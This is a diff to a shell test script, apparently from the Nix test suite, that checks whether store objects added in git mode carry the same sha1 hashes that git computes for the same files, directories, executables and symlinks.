-test "$hash1" = "sha256:1brffhvj2c0z6x8qismd43m0iy8dsgfmy10bgg9w11szway2wp9v"
+# Check Nix added object has matching git hash
+try2 () {
+    local hashPath="$1"
+    local expected="$2"
 
-rm -rf $TEST_ROOT/dummy2
-mkdir -p $TEST_ROOT/dummy2
-echo Hello World! > $TEST_ROOT/dummy2/hello
-path2=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy2)
-hash2=$(nix-store -q --hash $path2)
-test "$hash2" = "sha256:1vhv7zxam7x277q0y0jcypm7hwhccbzss81vkdgf0ww5sm2am4y0"
+    local path=$(nix store add --mode git --hash-algo sha1 "$repo/$hashPath")
 
-rm -rf $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3/dir
-touch $TEST_ROOT/dummy3/dir/file
-echo Hello World! > $TEST_ROOT/dummy3/dir/file
-touch $TEST_ROOT/dummy3/dir/executable
-chmod +x $TEST_ROOT/dummy3/dir/executable
-echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
-path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
-hash3=$(nix-store -q --hash $path3)
-test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
+    git -C "$repo" add "$hashPath"
+    git -C "$repo" commit -m "x"
+    git -C "$repo" status
+    local hashFromGit=$(git -C "$repo" rev-parse "HEAD:$hashPath")
+    [[ "$hashFromGit" == "$2" ]]
 
-rm -rf $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3
-mkdir -p $TEST_ROOT/dummy3/dir
-touch $TEST_ROOT/dummy3/dir/file
-ln -s './hello/world.txt' $TEST_ROOT/dummy3/dir/symlink
-path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
-hash3=$(nix-store -q --hash $path3)
-test "$hash3" = "sha256:1dwazas8irzpar89s8k2bnp72imfw7kgg4aflhhsfnicg8h428f3"
+    local caFromNix=$(nix path-info --json "$path" | jq -r ".[] | .ca")
+    [[ "fixed:git:sha1:$(nix hash convert --to nix32 "sha1:$hashFromGit")" = "$caFromNix" ]]
+}
+
+rm -rf "$repo/dummy1"
+echo Hello World! > "$repo/dummy1"
+try2 dummy1 "980a0d5f19a64b4b30a87d4206aade58726b60e3"
+
+rm -rf "$repo/dummy2"
+mkdir -p "$repo/dummy2"
+echo Hello World! > "$repo/dummy2/hello"
+try2 dummy2 "8b8e43b937854f4083ea56777821abda2799e850"
+
+rm -rf "$repo/dummy3"
+mkdir -p "$repo/dummy3"
+mkdir -p "$repo/dummy3/dir"
+touch "$repo/dummy3/dir/file"
+echo Hello World! > "$repo/dummy3/dir/file"
+touch "$repo/dummy3/dir/executable"
+chmod +x "$repo/dummy3/dir/executable"
+echo Run Hello World! > "$repo/dummy3/dir/executable"
+try2 dummy3 "f227adfaf60d2778aabbf93df6dd061272d2dc85"
+
+rm -rf "$repo/dummy4"
+mkdir -p "$repo/dummy4"
+mkdir -p "$repo/dummy4/dir"
+touch "$repo/dummy4/dir/file"
+ln -s './hello/world.txt' "$repo/dummy4/dir/symlink"
+try2 dummy4 "06f3e789820fc488d602358f03e3a1cbf993bf33"